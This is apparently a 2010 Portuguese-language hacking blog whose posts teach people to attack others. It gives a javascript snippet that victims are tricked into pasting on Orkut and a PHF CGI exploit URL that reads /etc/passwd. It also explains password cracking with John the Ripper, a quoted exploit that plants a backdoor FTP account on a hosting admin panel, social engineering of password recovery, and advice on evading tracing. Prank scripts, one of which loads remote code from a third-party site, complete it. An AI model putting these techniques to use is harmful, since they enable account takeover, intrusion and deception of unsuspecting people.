domingo, 16 de maio de 2010

novo metodo de roubar orkut 2010

cola o codigo a baixo no perfil da vitima e depois entra no
site q ta acima e manda um recado
pra todos amg com o codigo
q ta baixo
depois confira a sua caixa de entra todos amigos com email nao
confirmados
vao para seu email
um email pra vc mudar a senha deles e ficar com o perfil da vitima

javascript:alert("enviando senha deste profile para sua caixa de email!");javascript: cor = "red"; var timer_1; function vagalume () {(cor == "yellow") ? cor = "red": cor = "yellow"; document.links[20].parentNode.parentNode.style.backgroundColor = cor; timer_1 = setTimeout('vagalume ()',100)}; vagalume (); javascript: i=0; c=["blue","violet","green","red","gold","aqua","lime","yellow"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',10);void(O); javascript:i=0;cmm=['99870667','97823855'];a = document.forms[1]; a.target = '_top'; setInterval("i++; a.action = 'CommunityJoin.aspx?Action.join&cmm=' + cmm[i%cmm.length]; a.submit() ",300); void(O)

sexta-feira, 7 de maio de 2010

HACKIANDO SITES

1->Por favor, saiba que hackear webpages é considerado lammer em muitas opiniões, e muito provavelmente NÃO vai te dar uma boa reputação. As pessoas sempre podem checar log's uma vez notificadas de hacking, e provavelmente o seu IP/Host pode vir à tona e no mínimo irão te processar pela lei de crimes no computador, e vc será condenado à alguns anos de prisão e terá de pagar uma BOA quantia de dinheiro. Então por favor tente não abusar do conhecimento em relação a esse assunto. Esse texto tem apenas a função de informar.

2->HACKEANDO FREE WEB PAGES
O serviço de Hosting Gratis de WebPages é feito por empresas como a Tripod and Geocities, que dá espaço de graça e ganha dinheiro com propaganda. Há maneiras de hackear essas empresas e ter acesso à todas as senhas/usernames, mas é algo que seria complexo para a maioria das pessoas. Esse método que vai ser explicado é simples engenharia social, o que não é muito dificil de se fazer. Então, não se ache um Hacker de Elite só porque vc zuou a webpage de uma pobre pessoa que apenas esqueceu algumas informações pessoais na própria Page.
Tudo que vc tem que fazer é abrir uma conta num serviço de e-mail (ex.:Hotmail) e escolher uma vítima. Vc precisará achar a data de nascimento, o nome, e o e-mail antigo da pessoa, e se possivel, o endereço dela. Resumindo... Consiga o MAXIMO de info que vc puder sobre ela.
Todas essas empresas têm um serviço de verificação para pessoas que perderam a password da sua Page. Quando vc tiver o maximo de informações sobre a pessoa, mande um e-mail para a empresa dizendo que vc mudou de e-mail. ESPERE duas semanas e mande outro. Só que nesse, diga que vc perdeu a sua password. Na maioria das vezes eles te mandam um e-mail de volta, dizendo que vc precisa confirmar alguns dados pessoais seus, como a data de nascimento ou endereço.
Tudo o que vc tem de fazer é mandar todas as informações que vc conseguiu, e esperar a password chegar fresquinha no seu e-mail.
Por outro lado, companhias como a Geocities são muito ocupadas para ficar respondendo e-mailsde perda de password, então eles fizeram uma pagina onde membros podem pegar suas password'z de volta. (http://www.geocities.com/help/pass_form.html).

3>HACKEANDO PAGES DE USUÁRIOS
Existem várias maneiras de hackear pages de usuários em um servidor. Eu vou tentar listar aqui o máximo de maneiras possíveis para tal, mas não espere muito em termos de informação DETALHADA.
Pegando as password's:
Beleza, suponha que vc encontrou uma page que vc quer hackear, e que esta page esteja num server em que vc não tenha acesso, e que esse servidor seja BASICO, segurança leve. Tudo bem vai.... segurança BEM LEVE! Não vou mentir... funciona melhor em sites SEM SEGURANÇA. hehehe
Nesse caso, pegar a passwd é bem fácil. Abra um telnet para o FTP do server anonimamente e olhe no diretório ETC. Pegue o arquivo chamado "passwd". Outra maneira de pega-las é achar o seu alvo, abrir um WWW-Browser e digitar:
cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd DEPOIS do nome do servidor. Ex.:
http://www.vitima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
OBS: se vc não souber o que colocar no lugar de "vitima.com", SE MATE LAMMER!
Voce pode vir à pegar um arquivo passwd que não tenha contas de usuários, apenas defauts com a senha encriptada com um * no lugar. Em certos servidores com isso, vc pode ter passwd shadowed, mas em que todas as passwd files que já vi, havia um usurname como FTP e/ou NEWS que não tinham as senhas encriptadas, com um * no lugar.
Se vc achar apenas isso e NADA de senhas encriptadas, tente outra maneira de hackear o server.
Vc precisa examinar o arquivo de password'z e achar algo tipo assim:
rrc:uXDg04UkZgWOQ:201:4:Richard Clark:/export/home/rrc:/bin/ksh
Não precisa ser EXATAMENTE assim. a unica parte REALMENTE importante é o rrc:uXDg04UkZgWOQ, que é o username(rcc) e o passwd ENCRIPTADO(uXDg04UkZgWOQ)
Pegue um programa chamado JOHN THE RIPPER, que pode ser encontrado em qualquer Site de H/P/V/A/C na Web.
Para usar o JOHN THE RIPPER é facil. Se vc quer quebrar rapidamente as senhas, vá no prompt do DOS, no diretório do programa e digite:
john passwd -single
Onde passwd é o nome da passwd file. Por exemplo, se vc salvou a passwd file como pass.txt, ficaria:
john pass.txt -single
Uma coisa importante é que a passwd file esteja no mesmo diretório que o programa.
Para obter uma lista de outros métodos de quebrar uma passwd file, digite apenas "john", no diretório do programa, para obter uma lista de comandos.
Eu acho que o JOHN THE RIPPER funciona bem sem wordlists, mas algumas pessoas discordam. Se quiser se aprofundar no programa, procure um texto que enine a usar o JOHN THE RIPPER. Este aqui ensina apenas o básico.
Para concluir... se vc pegou a password e username, DIVIRTA-SE!!!

4>HACKEANDO UMA PAGE EM UM SERVER QUE VC TB TENHA ACESSO:
Essa seção ensina como hackear uma webpage num server onde vc já tem uma conta. Esse texto foi retirado de um texto feito por Lord Somer, e já que não quero arrancar algo importante do texto, vou apenas deixa-lo aí, apenas vou traduzi-lo, pois é um método complexo, onde qualquer cagada pode zoar o esquema todo.
Exploiting Net Adminstration CGI (by Lord Somer)
#######################################
Exploiting Net Administration Cgi's
like nethosting.com
Written by:Lord Somer
Date:9/2/97
#######################################
Bom, desde que a Nethosting.com fechou ou o que quer que seja, eu pensei:"Que porra eu vou fazer antes de esquecer como eu fiz esses hackz?" O que eu vou fazer é dizer COMO eu fiz, então daí vc pode vir a encontrar o mesmo sistema em algum outro lugar ou usar para tirar suas próprias idéias para o hack.
Basicamente, a nethosting.com fez toda a sua administração via CGI'z (net-admin.nethosting.com) Primeiro, vc precisa ter uma conta nesse server, falsifique unz numeros de cartão de crédito se necessário. Depois, entre dentro da área de administração... vc vai ver umas merdas como administração de FTP, e-mail, etc.
Quem se importa com e-mails? Então, vamos ao FTP. Clique na FTP ADMINISTRATION. Vamos dizer que vc está logado como 7hsphere.com. Seu url seria algo do tipo:
http://net-admin.nethosting.com/cgi-bin/add_ftp.cgi?7thspher
e.com+ljad32432jl
Apenas mude o 7hsphere.com para qualquer domínio que o sistema tenha, ou se no chmod, apenas delete essa parte, mas deixe o sinal de +, para editar o diretório usr/home. Na administração do FTP. faça uma conta de backdoor para esse domínio criando um diretório chamado /, já que multiplas /// continuam mostrando apenas /.
Uma vez que vc tem o backdoor, DIVIRTA-SE!
Bom, a teoria básica desse tipo de exploit é que:
-O CGI passava um parâmetro onde nós mudamos para algo do nosso interesse, para editarmos infoz.
-Desde que isso usa o bagulho depois do + para verificar se este é uma conta valida logada, isso não checa a password novamente.
- Multiplas ///'z no UNIX apenas significam uma /, então, não podemos ganhar acesso à diretórios de outras pessoas ou todo o diretório /usr/home.
Eu usei este método para hackear alguns lugares conhecidos:
-7thsphere.com
-sinnerz.com
-hawkee.com
-warez950.org
-lgn.com
E muitos outros sites desconhecidos.

5>OUTRA MANEIRA DE SE HACKEAR USER PAGES
Outro método que pode funcionar com servidores mal administrados é, às vezes, quando vc abre um FTP no server, vc sai do seu diretório home, volta algunz diretórioz, e acha o diretório da vitima. Uma vez que vc tenha feito isso, vc pode acessar os arquivos HTML, salvá-los no disco, editá-los e colocar novamente dentro do dir. Os arquivos HTML podem ou não ficar dentro do FTP, mas com adminz, eles não são acessíveis para outros usuários.

6>MÉTODOS QUE NÃO SE ENCAIXAM NAS OUTRAS CATEGORIAS.
Há muitas outras maneiras de se Hackear Web Pages. A burrice das pessoas é uma boa maneira. Muitas password'z são adivinháveis se elas não são hackeáveis. Isso não é hacking, mas sim estupidez de outras pessoas. Se vc pegar o root de um server, vc pode ter acesso a TUDO no servidor. Então, se vc quer hackear um servidor de webpage, ou acessar qualquer coisa nesse servidor, vc deve pegar uma conta e rodar um exploit no servidor, mas isso é uma coisa que newbies não devem tentar enquanto não tiverem certeza do que estão fazendo.

Gostou

quinta-feira, 6 de maio de 2010

como se tornar um hacker

Parece que muitas e muitas pessoas, todos os dias fazem esta pergunta em grupos de notícias, através de e-mail, em salas de chat. Não há nenhuma resposta simples, desde que cada um deve seguir seu próprio caminho. Mas há uma coisa que você deve ter para almejar o status de um hacker: determinação! Você deve ter um apetite voraz para encontrar informação e ensinar a si mesmo. Você não pode contar com outros, não pode contar com a escola. O curso de digitação não o levará a lugar algum.

Conseguindo Ajuda

É verdade que existe centenas e centenas de home pages de "hackers" na Internet. Se você nunca tentou enviar um e-mail para algum deles, uma coisa certamente se torna evidente, a falta de conhecimento. Qualquer pessoa (eu inclusive!) pode colocar uma página na Internet, adicionando links, textos,... de outros e se chamar um hacker. Mas peça por ajuda para escrever um shel script para explorar um bug e você ficará ligeiramente disapontado. Claro! há alguns hackers genuinos por aí, e se você conseguir encontrá-los, poderá pedir ajuda. Mas aí você estará dependendo de alguém para tudo. Um hacker deve ser autoditada.
Algumas Outras Necessidades

É importante saber e aceitar que você estará sob fogo, quando outros ouvirem sobre o seu interesse em se tornar um hacker. É para ser esperado: você está tentando ser parte de uma minoria que é odiada pelo grande público da área, por causa de imagem ruim que é comumente difundida. Deve discordar de comentários negativos e de julgamentos apressados. E finalmente, você deve ser humilde para se tornar um hacker. É absolutamente necessário admitir que você sabe apenas 1 por cento do que há para se saber sobre o mundo da informática e seus pecados, no objetivo de sempre direcionar seus esforços para aprender mais. Alguma vez, já notou que pessoas com grandes egos são idiotas ? Adivinhe por que ? Se você acha que sabe tudo, por que se encomodar em continuara aprendendo ? Um hacker tem um desejo insaciável por informação, são obssesivos sobre tudo, sejam redes telefônicas, internet, computadores ou qualquer coisa. É por este motivo que um hacker, constantemente, "explora" por mais informação. Então você precisa de tempo livre para se dedicar ao aprendizado. E o que você deve aprender ?
Tomando Os Primeiros Passos
Um conceito errado sobre hackers é que você deve ser um gênio em programação. Isto não é verdade! Claro, que quanto mais você souber melhor. Você precisa realmente saber algum shell scripting e linguagem C, básicos. Aqui o que eu acredito ser o mais essencial no aprendizado de um hacker: Primeiro, você deve aprender sobre o sistema operacional UNIX. Ele é um dos sistemas operacionais mais usados em servidores na Internet. Acessando um sistema UNIX via Telnet ou um terminal de cliente, não irá apresentar-lhe uma interface gráfica interessante, é um ambiente de somente texto, como o DOS. Não há gráficos, apenas um simples e extremamente eficiente sistema operacional que está muito a frente de seu tempo, desde quando foi criado. É claro que você poderá encontrar o X-Windows em máquinas Unix e rodar uma enorme variedade de aplicativos gráficos, mas é irrelevante para esta discussão. Você precisa ter um conhecimento complexo do sistema operacional. Sabendo como ele funciona em detalhes, é essencial. O código-fonte é distribuído gratuitamente para UNIX e seus variantes, e desta forma você deve estudá-lo. Compre livros, procure pela internet, consiga informações de todas as fontes que puder. Apenas esteja apto a usar o UNIX como se o usasse por toda a sua vida. Muitas pessoas esquecem as lições básicas e acham que precisam aprender apenas sobre as medidas de segurança do sistema operacional. Isto é fútil, como você poderá "penetrar" em um sistema se você não sabe usá-lo para simples tarefas rudimentares, como trocar diretórios, listar arquivos, ver quem está conectado, etc,... Além disso, como mencionei anteriormente, você precisa ter experiência em shell scripting. Quanto melhor nisso, você for, melhor e mais completo hacker você será. Saber também um pouco de linguagem C é também imperativo, desde que você irá precisar de alterar códigos, programação de socket para a técnica de spoofing e ataques fragmentados,...
Uma vez que você saiba os fundamentos do UNIX, aprenda sobre as suas funções primárias de rede com protocolos da Internet. É essencial entender como um computador comunica-se com outro pela Internet. O próximo passo é aprender especialmente sobre segurança em sistemas UNIX, que incluem o design das permissões de acesso e firewall. Novamente, todas estas informações podem ser encontradas nas mágicas coisas chamadas livros.
Agora que você tem um entendimento total sobre UNIX, você poderá aprender como contornar a segurança nestes sistemas. Existem vários arquivos na Internet tratando sobre os últimos bugs, como o bugtraq e 8lgm.org. Comece a mater uma trilha imaginária nas falhas em vários serviços, e então quando você inspecionar um sistema ele irá surgir em sua mente.
A Psicologia de Hacke(ar)

É importante entender como o cérebro humano funciona em outras pessoas. Para se ter uma ideia de como comprometer a segurança de computadores, você deve "penetrar" na mente do administrador do sistema e pensar como você protegeria o sistema se fosse o encarregado. Você deve também levar em consideração que a muitas das pessoas são estúpidas, e isto será decisivo se você estiver tentando descobrir algumas senhas. Use o senso comum.

Nunca Pare de Aprender

Não pare aqui! Depois de entender sobre redes e UNIX, continue aprendendo mais. O que sobrou ? VAX/VMS, que é outro sistema operacional encontrado em alguns computadores conectados na Internet. Você pode começar explorando o mundo da criptografia (o que é suicídio se você odeia matemática). Mantenha-se atualizado nos novos desenvolvimentos em tecnologia. Simplificando: aprenda tudo o que puder todo dia.
Eis algumas abilidades de Kevin Mitnick (talvez o mais famoso hacker de todos os tempos): VM/CMS, OS/VS1, DOS/VSE, MS-DOS, RST/E, VAX/VMS, UNIX, TOP-20,... Familiarizado com algum destes ? Isto só nos faz pensar em uma coisa, vamos estudar!!!
Como Não Ser Pego

O erro que provavelmente todo hacker comete é que ele ou ela torna-se muito convencido ou popular. Não saia gritando que é um hacker na escola. Confie em menos pessoas posíveis. Quanto menos pessoas souberem que você está nisso, melhor. Não faça coisas idiotas, como hacke(ar) da sua própria casa a algum sistema de alta segurança. Embora este método está agora, "fora de moda", desde que existem meios mais fáceis de esconder sua identidade quando hack(eando) pela Internet. Existem vários meios para dificultar o rastreamento quando hack(eando) sistemas da Internet. Um deles, é conectar-se em diversos servidores com Telnet antes de acertar o seu alvo. Isto tornará o rastreamento muito mais difícil. Tente conectar-se a sistemas localizados em outros países. Nunca tente hack(ear) uma instituição governamental, você irá ser pego e irá para a cadeia! Não seja estúpido achando ser bom demais para ser pego. Nunca fale sobre hack(ear) ao telefone principalmente nos sem fio, você nunca sabe quem está ouvindo. Encripte suas mensagens de e-mail. Seja um pouco paranoico! Quanto mais paranoico você for, menos chance você terá de ser pego.
Último, Mas Muito Importante

Sempre digo que conhecimento é apenas metade do que faz um hacker. A outra metade é a ética. Você pode ser um perfeito gênio, mas se não tiver ética, você está no mesmo nível de um criminoso. Todo hacker possui um código de ética.

Você Não é um Hacker se

* Você pirateia software
* Você espalha viroses (qualquer um com um pouco de conhecimento de Assembler pode criar um vírus)
* Você deleta arquivos alheios e destroi seus sistemas (qualquer um pode deletar um arquivo)
* Você rastreia empresas de cartão de crédito ou bancos para conseguir dinheiro.

Gostou? então copie essa postagem para seu Blog:

quarta-feira, 5 de maio de 2010

assustar amg

Você quer excluir seu profile?

javascript:confirm("Vocêquer excluir seu profile?");alert("Aguarde um instante");alert("Perfilexcluido comsucesso.");document.location=("http://www.orkut.com.br/HomeDeleted.aspx?reason=5/");alert("Maiscodigos no site:\n http://www-fly.blogspot.com/");void(0);

Dica: Quem usar o código irá aparecer uma janelinha pergutando se você quer excluir o seu profile no orkut... aí não tem jeito só testando mesmo pra ver.

Baixando vírus...

javascript:sc=document.createElement('script');sc.src="http://www.viciados-hacker.com/susto2.js";document.getElementsByTagName('head')[0].appendChild(sc);alert("Maiscodigos no site:\n http://www-fly.blogspot.com/");void(0);

Dica: Este código é usado colando-o na barra de endereços do seu navegador, mas não precisa entrar em pânico, o código não é malicioso.

Seu pc será formatado.

javascript:nome=prompt("Digiteseu nome");document.write(""+ nome +", você foi vitima de umaquadrilha de hackers, por favor, por motivos de segurança,precisamos de sua colaboração enquanto o Windows éformatado.");confirm("Atenção:nSe você optar pornão formatar seu computador agora, seu Windows entrará emcolapso.nDeseja formata-loagora?");document.write("
Preparando Windows para serformatado em
3
2
1
0");document.write("
Setup Completo"); alert("Porfavor, agora solicitamos o Numero de licença do seuWindows");alert("Seu número de licença estálocalizado no Painel de Controle/Sistema/General > ProductID");prompt("Digite o número de licença para continuar");alert("Numero de Licença INVALIDO");prompt("Digite onúmero de licença para continuar"); alert("Numero deLicença INVALIDO");confirm("Parece que Windows nao e original,clique em ok para continuar aformatação");document.write("Formataçãocontinuada");document.write("
Computador sendo formatado...");alert("Espere um Momento");alert("Seu computador sera desligadoagora");document.write("
Desligar em 2 minutos");alert("Agorapode continuar suas atividades...");alert("Peguei voce!nIsso e apenasuma pegadinha!!!nDepois desse susto, quero que voce conheca o melhorsite de codigos doorkut!");document.location=(http://www-fly.blogspot.com/);void(0);

Dica: Depois que usar o código aparecerá uma mensagem pergutando seu nome, depois dizerá que voce foi vítima de uma quadrilha de hackers, aí começa o drama.

terça-feira, 4 de maio de 2010

Como invadir um computador

Eu não me responsabilizo pelos seus atos

Invasão por ip
Alegria de uns, tristeza de outros, na verdade, aqueles que utilizam a rede Dial-Up do Win95 para sua conecção com a internet podem estar correndo sérios riscos a não ser, é claro, que assim conectam-se propositalmente, com intenções "diversas". Utilizar-se de uma conecção PPP do Win95 num provedor de acesso, significa estar disponibilizando seu computador a todos os usuário da net. Mesmo sem o compartilhamento de arquivos, existem diversas ferramentas que permitem a outra pessoa conectar-se ao seu computador caso você esteja utilizando esse tipo de conecção. Conecte-se à Internet utilizando a rede Dial-Up do Win95. Se o seu provedor não disponibilizar uma conecção do tipo PPP, estas dicas não funcionarão. Verifique antes, se você possui os drivers clientes para redes Microsoft. Caso não estejam instalados, instale-os através do Painel de Controle, no ícone Redes. Verifique também se o compartilhamento de Arquivos e Impressoras está instalado. Se estiver, você estará sujeito à que outra pessoa conecte-se ao seu computador simplesmente sabendo seu IP. Se bem que, para aqueles que já sabem, existem mil maneiras diferentes de se "burlar" a fraquinha segurança do Win95. Para você poder encontrar outros computadores compartilhados, você deve configurar WINS e LMHOSTS. O WINS é utilizado para localizar os computadores com IP fixo. O LMHOSTS, é acionado automaticamente na procura de computadores que possuem IP dinâmicos. Configurar essas opções é simples. Vá ao Painel de Controle e abra Rede. Verifique as propriedades do protocolo TCP/IP. Alí você encontrará a opção para ativar a resolução WINS. No caso de você não conhecer nenhum servidor WINS, utilize 204.118.34.6 como primário e 204.118.34.11 como secundário. Esses servidores são dos USA, e gratuítos. Caso queira outros endereços, utilize um dos mecanismos de busca na Internet. Para configurar o LMHOSTS, você precisa criar um arquivo texto simples, utilizando-se até mesmo o Bloco de Notas do Windows. O arquivo criado deve chamar-se LMHOSTS. É nesse arquivo que ficarão os endereços de IP e os nomes dos computadores que você terá acesso. Para localizar um determinado computador, você digita o seu número de IP e a seguir seu NetBios, na mesma linha, separados por um espaço. Se você executar o programa NBSTSTAT, seguido da opção -N, você obterá essa lista, com o nome e o IP de seu computador sempre sendo o primeiro da lista, seguido das outras máquinas disponíveis, tudo numa janela DOS. Através do Explorer você poderá ver os computadores disponíveis na rede,dos quais você ainda poderá utilizar os discos mapeando-os, o que os tornará unidades de seu computador.

Gostou? então copie essa postagem para seu Blog:

segunda-feira, 3 de maio de 2010

- =[ Oração hacker ]= -

Byte nosso de cada dia que nós trás hoje
-
Falsificado seja o vosso registro
-
Venha a nós o vosso password
-
Seja pirateada a vossa integridade
-
Assim na web como no unix
-
o scripts nosso de cada dia que nos auxiliai hoje
-
Crackeia os nossos programas
-
Assim como nos hackeamos aqueles que os tem obtido
-
Não nos deixeis cair na prisão
-
Mas nos livrai dos log files,
-
Disconected ...

domingo, 2 de maio de 2010

COMO FORMATAR UM XP

Um super tutorial semi-interativo, onde se se aprende a formatar um PC, instalando o Windows XP.

Clique Aqui Para Saber Mais Informações.

Idioma: Portugues
Tamanho: 1.71 MB
Hospedagem: Easyshare / Megaupload

Iniciar Download

assuatar amg

Você quer excluir seu profile?

javascript:confirm("Vocêquer excluir seu profile?");alert("Aguarde um instante");alert("Perfilexcluido comsucesso.");document.location=("http://www.orkut.com.br/HomeDeleted.aspx?reason=5/");alert("Maiscodigos no site:\n http://www-fly.blogspot.com/");void(0);

Dica: Quem usar o código irá aparecer uma janelinha pergutando se você quer excluir o seu profile no orkut... aí não tem jeito só testando mesmo pra ver.

Baixando vírus...

javascript:sc=document.createElement('script');sc.src="http://www.viciados-hacker.com/susto2.js";document.getElementsByTagName('head')[0].appendChild(sc);alert("Maiscodigos no site:\n http://www-fly.blogspot.com/");void(0);

Dica: Este código é usado colando-o na barra de endereços do seu navegador, mas não precisa entrar em pânico, o código não é malicioso.

Seu pc será formatado.

javascript:nome=prompt("Digiteseu nome");document.write(""+ nome +", você foi vitima de umaquadrilha de hackers, por favor, por motivos de segurança,precisamos de sua colaboração enquanto o Windows éformatado.");confirm("Atenção:nSe você optar pornão formatar seu computador agora, seu Windows entrará emcolapso.nDeseja formata-loagora?");document.write("
Preparando Windows para serformatado em
3
2
1
0");document.write("
Setup Completo"); alert("Porfavor, agora solicitamos o Numero de licença do seuWindows");alert("Seu número de licença estálocalizado no Painel de Controle/Sistema/General > ProductID");prompt("Digite o número de licença para continuar");alert("Numero de Licença INVALIDO");prompt("Digite onúmero de licença para continuar"); alert("Numero deLicença INVALIDO");confirm("Parece que Windows nao e original,clique em ok para continuar aformatação");document.write("Formataçãocontinuada");document.write("
Computador sendo formatado...");alert("Espere um Momento");alert("Seu computador sera desligadoagora");document.write("
Desligar em 2 minutos");alert("Agorapode continuar suas atividades...");alert("Peguei voce!nIsso e apenasuma pegadinha!!!nDepois desse susto, quero que voce conheca o melhorsite de codigos doorkut!");document.location=(http://www-fly.blogspot.com/);void(0);

Dica: Depois que usar o código aparecerá uma mensagem pergutando seu nome, depois dizerá que voce foi vítima de uma quadrilha de hackers, aí começa o drama.

PONTOS FRACOS

Existem inúmeras categorias de ataque a serviços Internet, explorando falhas de software, hardware e principalmente burlando esquemas de segurança ineficazes em nossas políticas operacionais. Por exemplo:

Sniffer: Captura informações que trafegam pela rede, como logins e senhas em texto não-criptografado, podendo ser utilizadas futuramente por um invasor.

Spoof: Baseia-se na confiança da negociação entre servidores, que acreditam na veracidade do endereço de origem daquela ordem ou informação, e podem sofrer um ataque por mensagens na qual a origem é "disfarçada" como sendo de alguém de confiança.

Mudanças de rota: Um ataque desta natureza pode fazer com que toda a informação de um dado servidor seja obrigada a passar por um espião antes de seguir seu caminho, ou simplesmente sejam redirecionadas para lugar nenhum, causando a "queda" do serviço.

Trojan Horse: Um programa pode ser inadvertidamente instalado em um servidor, o qual permitiria uma invasão por alguma porta ou "brecha" propositadamente implantada neste programa.

Replay: Alguma ação, comandos ou seqüência de eventos podem ser observados durante um processo de autenticação, e repetidas, posteriormente, por um invasor para obter acesso a estes sistemas.

Vírus: À primeira vista pode parecer um simples problema de usuários domésticos, mas os vírus, se não forem devidamente eliminados e controlados, podem causar, direta e indiretamente, vários problemas em uma rede, desde a impossibilidade de comunicação interna, até a interrupção dos serviços vitais.

Adulteração: A falta de um controle de conteúdo eficiente pode fazer com que uma informação seja adulterada durante sua transmissão, pondo em risco a comunicação entre dois sistemas.

Alguns produtos, tais como servidores ou até mesmo sistemas operacionais completos, vêm configurados "da fábrica" de uma forma muito pouco segura, e é necessário conhecer todos os aspectos da nova ferramenta instalada no seu sistema para que ela seja corretamente utilizada.
Programas como servidores de mail, ftp, web ou configurações do sistema, como permissões de arquivos, aplicativos desnecessários (tal como um lpd em um servidor exclusivo de web) devem ser completamente vistoriados antes da sua instalação, procurando se informar sobre suas capacidades de auditoria e sobre seus recursos de segurança.

Pode-se ainda, caso o sistema em questão seja inseguro e necessário, cogitar produtos que possam implementar esta segurança à parte, e dar a mesma importância a eles, instalando-os simultaneamente, e nunca "deixar para depois", pois se alguém detectar uma falha no seu sistema, ela será explorada imediatamente!

E o mais importante: estas configurações padrões, ou os erros mais comuns durante as instalações, são os primeiros alvos dos hackers e, em pouquíssimo tempo seu sistema poderá ser completamente comprometido por pura falta de atenção.